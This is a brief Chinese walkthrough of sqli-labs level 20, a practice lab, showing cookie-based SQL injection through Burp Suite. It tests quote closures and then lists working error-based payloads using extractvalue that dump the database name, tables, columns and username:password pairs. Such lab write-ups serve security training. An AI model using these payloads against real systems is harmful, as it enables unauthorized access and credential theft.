sqli-labs第二十关——POST—cookie注入

一：判断注入类型

输入密码，bp抓包

返回这个页面 

对此页面再次进行抓包

Cookie: uname=1
Cookie: uname=1'
Cookie: uname=1"
Cookie: uname=1')
Cookie: uname=1")

单引号时产生报错，尝试闭合 

闭合成功

二：开始注入

1.爆数据库名

Cookie: uname=1' and extractvalue(1,concat(0x7e,(database())))#

 

2.爆表名

Cookie: uname=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#

 

3.爆列名

Cookie: uname=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#

 

4.爆数据

查表的数量

Cookie: uname=1' and extractvalue(1,concat(0x7e,(select count(*) from users)))#

Cookie: uname=1' and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#
Cookie: uname=1' and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#

 

 

 ❀❀❀  完结撒花！！！❀❀❀